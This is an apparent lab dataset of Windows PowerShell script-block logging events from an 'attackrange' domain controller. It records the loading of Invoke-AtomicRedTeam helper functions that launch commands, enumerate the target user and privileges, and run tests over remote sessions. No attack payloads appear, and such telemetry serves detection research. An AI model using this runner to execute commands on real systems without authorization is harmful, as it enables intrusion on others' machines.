SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467218
Keywords=None
Message=Started invocation of ScriptBlock ID: bff28245-7378-4201-af85-7adcd845ae7d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467217
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Write-KeyValue ($key, $value) {
    Write-Host -ForegroundColor  Cyan -NoNewline $key
    $split = $value -split "(#{[a-z-_A-Z]*})"
    foreach ($s in $split){
        if($s -match "(#{[a-z-_A-Z]*})"){
            Write-Host -ForegroundColor Red -NoNewline $s
        }
        else {
            Write-Host -ForegroundColor Green -NoNewline $s
        }
    }
    Write-Host ""
}

ScriptBlock ID: bff28245-7378-4201-af85-7adcd845ae7d
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Write-KeyValue.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467216
Keywords=None
Message=Completed invocation of ScriptBlock ID: e1f3e3e5-06d9-44bf-b0b7-411b03c37650
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467215
Keywords=None
Message=Started invocation of ScriptBlock ID: e1f3e3e5-06d9-44bf-b0b7-411b03c37650
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467214
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Write-ExecutionLog($startTime, $technique, $testNum, $testName, $logPath, $targetHostname, $targetUser, $guid) {
    if (!(Test-Path $logPath)) { 
        New-Item $logPath -Force -ItemType File | Out-Null
    } 

    $timeUTC = (Get-Date($startTime).toUniversalTime() -uformat "%Y-%m-%dT%H:%M:%SZ").ToString()
    $timeLocal = (Get-Date($startTime) -uformat "%Y-%m-%dT%H:%M:%S").ToString()
    [PSCustomObject][ordered]@{ 
        "Execution Time (UTC)"   = $timeUTC;
        "Execution Time (Local)" = $timeLocal; 
        "Technique"              = $technique; 
        "Test Number"            = $testNum; 
        "Test Name"              = $testName; 
        "Hostname"               = $targetHostname; 
        "Username"               = $targetUser
        "GUID"                   = $guid
    } | Export-Csv -Path $LogPath -NoTypeInformation -Append
}

ScriptBlock ID: e1f3e3e5-06d9-44bf-b0b7-411b03c37650
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Write-ExecutionLog.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467213
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6fb28515-b853-42df-b886-9a46434fe8ae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467212
Keywords=None
Message=Started invocation of ScriptBlock ID: 6fb28515-b853-42df-b886-9a46434fe8ae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467211
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Invoke-CleanupDescription(){
    $ret1 = $test.description.ToString().trim() -replace '(?<!\n)\n(?!\n)', ' ' #replace single linefeeds with a space
    $ret1 -replace '\n\n', "`n" #replace double linefeeds with a single linefeed
}
function Show-Details ($test, $testCount, $technique, $customInputArgs, $PathToAtomicsFolder) {
    # Header info
    $tName = $technique.display_name.ToString() + " " + $technique.attack_technique 
    Write-Host -ForegroundColor Magenta "[********BEGIN TEST*******]"
    Write-KeyValue "Technique: "  $tName
    Write-KeyValue "Atomic Test Name: " $test.name.ToString()
    Write-KeyValue "Atomic Test Number: " $testCount
    if($test.auto_generated_guid) { Write-KeyValue "Atomic Test GUID: " $test.auto_generated_guid}
    Write-KeyValue "Description: " $(Invoke-CleanupDescription $test)

    # Attack Commands
    Write-Host -ForegroundColor Yellow "`nAttack Commands:"
    $elevationRequired = $false
    if ($nul -ne $test.executor.elevation_required ) { $elevationRequired = $test.executor.elevation_required }
    $executor_name = $test.executor.name
    Write-KeyValue "Executor: " $executor_name
    Write-KeyValue "ElevationRequired: " $elevationRequired
    $final_command = Merge-InputArgs $test.executor.command $test $customInputArgs $PathToAtomicsFolder
    Write-KeyValue "Command:`n" $test.executor.command.trim()
    if ($test.executor.command -ne $final_command) { Write-KeyValue "Command (with inputs):`n" $final_command.trim() }

    # Cleanup Commands
    if ($nul -ne $test.executor.cleanup_command) {
        Write-Host -ForegroundColor Yellow "`nCleanup Commands:"
        $final_command = Merge-InputArgs $test.executor.cleanup_command $test $customInputArgs $PathToAtomicsFolder
        Write-KeyValue "Command:`n" $test.executor.cleanup_command.trim()
        if ($test.executor.cleanup_command -ne $final_command) { Write-KeyValue "Command (with inputs):`n" $final_command.trim() }
    }

    # Dependencies
    if ($nul -ne $test.dependencies) {
        Write-Host -ForegroundColor Yellow "`nDependencies:"
        foreach ($dep in $test.dependencies) {
            $final_command_prereq = Merge-InputArgs $dep.prereq_command $test $customInputArgs $PathToAtomicsFolder
            $final_command_get_prereq = Merge-InputArgs $dep.get_prereq_command $test $customInputArgs $PathToAtomicsFolder
            $description = Merge-InputArgs $dep.description $test $customInputArgs $PathToAtomicsFolder
            Write-KeyValue "Description: " $description.trim()
            Write-KeyValue "Check Prereq Command:`n" $dep.prereq_command.trim()
            if ( $dep.prereq_command -ne $final_command_prereq ) { Write-KeyValue "Check Prereq Command (with inputs):`n" $final_command_prereq.trim() }
            Write-KeyValue "Get Prereq Command:`n" $dep.get_prereq_command.trim()
            if ( $dep.get_prereq_command -ne $final_command_get_prereq ) { Write-KeyValue "Get Prereq Command (with inputs):`n" $final_command_get_prereq.trim() }
        }
    }
    # Footer
    Write-Host -ForegroundColor Magenta "[!!!!!!!!END TEST!!!!!!!]`n`n"

}

ScriptBlock ID: 6fb28515-b853-42df-b886-9a46434fe8ae
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Show-Details.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467210
Keywords=None
Message=Completed invocation of ScriptBlock ID: a389ea4d-7d37-4b9c-87f3-8c44df09eaf6
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467209
Keywords=None
Message=Started invocation of ScriptBlock ID: a389ea4d-7d37-4b9c-87f3-8c44df09eaf6
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467208
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Get-InputArgs([hashtable]$ip, $customInputArgs, $PathToAtomicsFolder) {
    $defaultArgs = @{ }
    foreach ($key in $ip.Keys) {
        $defaultArgs[$key] = $ip[$key].default
    }
    # overwrite defaults with any user supplied values
    foreach ($key in $customInputArgs.Keys) {
        if ($defaultArgs.Keys -contains $key) {
            # replace default with user supplied
            $defaultArgs.set_Item($key, $customInputArgs[$key])
        }
    }
    $defaultArgs
}

function Merge-InputArgs($finalCommand, $test, $customInputArgs, $PathToAtomicsFolder) {
    if (($null -ne $finalCommand) -and ($test.input_arguments.Count -gt 0)) {
        Write-Verbose -Message 'Replacing inputArgs with user specified values, or default values if none provided'
        $inputArgs = Get-InputArgs $test.input_arguments $customInputArgs $PathToAtomicsFolder

        foreach ($key in $inputArgs.Keys) {
            $findValue = '#{' + $key + '}'
            $finalCommand = $finalCommand.Replace($findValue, $inputArgs[$key])
        }
    }

    # Replace $PathToAtomicsFolder or PathToAtomicsFolder with the actual -PathToAtomicsFolder value
    $finalCommand = ($finalCommand -replace "\`$PathToAtomicsFolder", $PathToAtomicsFolder) -replace "PathToAtomicsFolder", $PathToAtomicsFolder

    $finalCommand
}

function Invoke-PromptForInputArgs([hashtable]$ip) {
    $InputArgs = @{ }
    foreach ($key in $ip.Keys) {
        $InputArgs[$key] = $ip[$key].default
        $newValue = Read-Host -Prompt "Enter a value for $key , or press enter to accept the default.`n$($ip[$key].description.trim()) [$($ip[$key].default.trim())]"
        # replace default with user supplied
        if (-not [string]::IsNullOrWhiteSpace($newValue)) {
            $InputArgs.set_Item($key, $newValue)
        }
    }
    $InputArgs
}


ScriptBlock ID: a389ea4d-7d37-4b9c-87f3-8c44df09eaf6
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Replace-InputArgs.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467207
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5f090480-980d-4310-96b7-c3ea52345186
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467206
Keywords=None
Message=Started invocation of ScriptBlock ID: 5f090480-980d-4310-96b7-c3ea52345186
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467205
Keywords=None
Message=Creating Scriptblock text (1 of 1):
# The Invoke-Process function is loosely based on code from https://github.com/guitarrapc/PowerShellUtil/blob/master/Invoke-Process/Invoke-Process.ps1
function Invoke-Process {
    [OutputType([PSCustomObject])]
    [CmdletBinding()]
    param
    (
        [Parameter(Mandatory = $false, Position = 0)]
        [string]$FileName = "PowerShell.exe",

        [Parameter(Mandatory = $false, Position = 1)]
        [string]$Arguments = "",
        
        [Parameter(Mandatory = $false, Position = 3)]
        [Int]$TimeoutSeconds = 120,

        [Parameter(Mandatory = $false, Position =4)]
        [String]$stdoutFile = $null,

        [Parameter(Mandatory = $false, Position =5)]
        [String]$stderrFile = $null
    )

    end {
        $WorkingDirectory = if ($IsLinux -or $IsMacOS) { "/tmp" } else { $env:TEMP }
        try {
            # new Process
            if ($stdoutFile) {
                $process = Start-Process -FilePath $FileName -ArgumentList $Arguments -WorkingDirectory $WorkingDirectory -NoNewWindow -PassThru -RedirectStandardOutput (Join-Path $WorkingDirectory $stdoutFile) -RedirectStandardError (Join-Path $WorkingDirectory $stderrFile)
             }
            else {
                $process = Start-Process -FilePath $FileName -ArgumentList $Arguments -WorkingDirectory $WorkingDirectory -NoNewWindow -PassThru
            }
            $handle = $process.Handle # cache process.Handle, otherwise ExitCode is null from powershell processes

            # wait for complete
            $Timeout = [System.TimeSpan]::FromSeconds(($TimeoutSeconds))
            if (-not $process.WaitForExit($Timeout.TotalMilliseconds)) {
                Invoke-KillProcessTree $process.id

                Write-Host -ForegroundColor Red "Process Timed out after $TimeoutSeconds seconds, use '-TimeoutSeconds' to specify a different timeout"
                if ($stdoutFile) {
                    # Add a warning in stdoutFile in case of timeout
                    # problem: $stdoutFile was locked in writing by the process we just killed, sometimes it's too fast and the lock isn't released immediately
                    # solution: retry at most 10 times with 100ms between each attempt
                    For($i=0;$i -lt 10;$i++) { 
                        try {
                            "<timeout>" | Out-File (Join-Path $WorkingDirectory $stdoutFile) -Append -Encoding ASCII
                            break # if we're here it means the file wasn't locked and Out-File worked, so we can leave the retry loop
                        } catch {} # file is locked
                        Start-Sleep -m 100
                    }
                }
            }

            if ($IsLinux -or $IsMacOS) {
                Start-Sleep -Seconds 5 # On nix, the last 4 lines of stdout get overwritten upon return so pause for a bit to ensure user can view results
            }
            
            # Get Process result 
            return $process.ExitCode
        }
        finally {
            if ($null -ne $process) { $process.Dispose() }
        }
    }
}


ScriptBlock ID: 5f090480-980d-4310-96b7-c3ea52345186
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467204
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6a5a2a89-7c85-4185-9210-6222b3f10c24
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467203
Keywords=None
Message=Started invocation of ScriptBlock ID: 6a5a2a89-7c85-4185-9210-6222b3f10c24
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467202
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Invoke-KillProcessTree {
    Param([int]$ppid)
    if ($IsLinux -or $IsMacOS) {
        sh -c "pkill -9 -P $ppid"
    }
    else {
        while ($null -ne ($gcim = Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq $ppid })) {
            $gcim | ForEach-Object { Invoke-KillProcessTree $_.ProcessId; Start-Sleep -Seconds 0.5 }
        }
        Stop-Process -Id $ppid -ErrorAction Ignore
    }
}


ScriptBlock ID: 6a5a2a89-7c85-4185-9210-6222b3f10c24
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-KillProcessTree.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467201
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6b288782-b9fb-482b-a5a3-97a2d5c265e9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467200
Keywords=None
Message=Started invocation of ScriptBlock ID: 6b288782-b9fb-482b-a5a3-97a2d5c265e9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467199
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Invoke-ExecuteCommand ($finalCommand, $executor, $TimeoutSeconds, $session = $null, $interactive) {
    $null = @(
        if ($null -eq $finalCommand) { return 0 }
        $finalCommand = $finalCommand.trim()
        Write-Verbose -Message 'Invoking Atomic Tests using defined executor'
        if ($executor -eq "command_prompt" -or $executor -eq "sh" -or $executor -eq "bash") {
            $execPrefix = "-c"
            $execExe = $executor
            if ($executor -eq "command_prompt") { 
                    $execPrefix = "/c"; 
                    $execExe = "cmd.exe"; 
                    $execCommand = $finalCommand -replace "`n", " & " 
            }
            else {
                    $finalCommand = $finalCommand -replace "[\\`"]", "`\$&"
                    $execCommand = $finalCommand -replace "(?<!;)\n", "; "
            }
            $arguments = "$execPrefix `"$execCommand`""
        }
        elseif ($executor -eq "powershell") {
            $execCommand = $finalCommand -replace "`"", "`\`"`""
            if ($session) {
                if ($targetPlatform -eq "windows") {
                        $execExe = "powershell.exe"
                }
                else {
                        $execExe = "pwsh"
                }
            }
            else {
                $execExe = "powershell.exe"; if ($IsLinux -or $IsMacOS) { $execExe = "pwsh" }
            }
            $arguments = "& {$execCommand}"
        }
        else {
            Write-Warning -Message "Unable to generate or execute the command line properly. Unknown executor"
            $res = -1
            return $res
        }
        if ($session) {
            $scriptParentPath = Split-Path $import -Parent
            $fp = Join-Path $scriptParentPath "Invoke-Process.ps1"
            $fp2 = Join-Path $scriptParentPath "Invoke-KillProcessTree.ps1"
            invoke-command -Session $session -FilePath $fp
            invoke-command -Session $session -FilePath $fp2
            $res = invoke-command -Session $session -ScriptBlock { Invoke-Process -filename $Using:execExe -Arguments $Using:arguments -TimeoutSeconds $Using:TimeoutSeconds -stdoutFile "art-out.txt" -stderrFile "art-err.txt"  }
        }
        else {
            if ($interactive) {
                # This use case is: Local execution of tests that contain interactive prompts
                #   In this situation, let the stdout/stderr flow to the console
                $res = Invoke-Process -filename $execExe -Arguments $arguments -TimeoutSeconds $TimeoutSeconds
            }
            else {
                # Local execution that DO NOT contain interactive prompts
                #   In this situation, capture the stdout/stderr for Invoke-AtomicTest to send to the caller
                $res = Invoke-Process -filename $execExe -Arguments $arguments -TimeoutSeconds $TimeoutSeconds -stdoutFile "art-out.txt" -stderrFile "art-err.txt" 
            }
        }
    )
    $res
}


ScriptBlock ID: 6b288782-b9fb-482b-a5a3-97a2d5c265e9
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-ExecuteCommand.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467198
Keywords=None
Message=Completed invocation of ScriptBlock ID: f330281d-53f0-4cce-8dbe-850011ee7f5d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467197
Keywords=None
Message=Started invocation of ScriptBlock ID: f330281d-53f0-4cce-8dbe-850011ee7f5d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467196
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Invoke-CheckPrereqs ($test, $isElevated, $customInputArgs, $PathToAtomicsFolder, $TimeoutSeconds, $session = $null) {
    $FailureReasons = New-Object System.Collections.ArrayList
    if ( $test.executor.elevation_required -and -not $isElevated) {
        $FailureReasons.add("Elevation required but not provided`n") | Out-Null
    }
    foreach ($dep in $test.dependencies) {
        $executor = Get-PrereqExecutor $test
        $final_command = Merge-InputArgs $dep.prereq_command $test $customInputArgs $PathToAtomicsFolder
        if($executor -ne "powershell") { $final_command = ($final_Command.trim()).Replace("`n", " && ") }
        $res = Invoke-ExecuteCommand $final_command $executor $TimeoutSeconds  $session
        $description = Merge-InputArgs $dep.description $test $customInputArgs $PathToAtomicsFolder
        if ($res -ne 0) {
            $FailureReasons.add($description) | Out-Null
        }
    }
    $FailureReasons
}

ScriptBlock ID: f330281d-53f0-4cce-8dbe-850011ee7f5d
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-CheckPrereqs.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467195
Keywords=None
Message=Completed invocation of ScriptBlock ID: 67f733c6-8bda-422a-b32b-fd75fa4c20f0
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467194
Keywords=None
Message=Started invocation of ScriptBlock ID: 67f733c6-8bda-422a-b32b-fd75fa4c20f0
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467193
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Get-TargetInfo($Session) {
    $tmpDir = "$env:TEMP\"
    $isElevated = $false
    $targetHostname = hostname
    $targetUser = whoami
    if ($Session) {
        $targetPlatform, $isElevated, $tmpDir, $targetHostname, $targetUser = invoke-command -Session $Session -ScriptBlock {
            $targetPlatform = "windows"
            $tmpDir = "/tmp/"
            $targetHostname = hostname
            $targetUser = whoami
            if ($IsLinux) { $targetPlatform = "linux" }
            elseif ($IsMacOS) { $targetPlatform =  "macos" }
            else {  # windows
                $tmpDir = "$env:TEMP\"
                $isElevated = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
            }
            if ($IsLinux -or $IsMacOS) {
                $isElevated = $false
                $privid = id -u                
                if ($privid -eq 0) { $isElevated = $true }
            }
            $targetPlatform, $isElevated, $tmpDir, $targetHostname, $targetUser
        } # end ScriptBlock for remote session
    }
    else {
        $targetPlatform = "linux"
        if ($IsLinux -or $IsMacOS) {
            $tmpDir = "/tmp/"
            $isElevated = $false
            $privid = id -u                
            if ($privid -eq 0) { $isElevated = $true }
            if ($IsMacOS) { $targetPlatform = "macos" }
        }
        else {
            $targetPlatform = "windows"
            $isElevated = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        }
      
    }
    $targetPlatform, $isElevated, $tmpDir, $targetHostname, $targetUser
} 

ScriptBlock ID: 67f733c6-8bda-422a-b32b-fd75fa4c20f0
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Get-TargetInfo.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467192
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7271e5d1-eb2b-4a6b-9d49-bd3d8cabec30
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467191
Keywords=None
Message=Started invocation of ScriptBlock ID: 7271e5d1-eb2b-4a6b-9d49-bd3d8cabec30
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467190
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Get-PrereqExecutor ($test) {
    if ($nul -eq $test.dependency_executor_name) { $executor = $test.executor.name } 
    else { $executor = $test.dependency_executor_name }
    $executor
}

ScriptBlock ID: 7271e5d1-eb2b-4a6b-9d49-bd3d8cabec30
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Get-PrereqExecutor.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467189
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5dff6487-0f7c-4e66-96a8-4ad026a61af2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
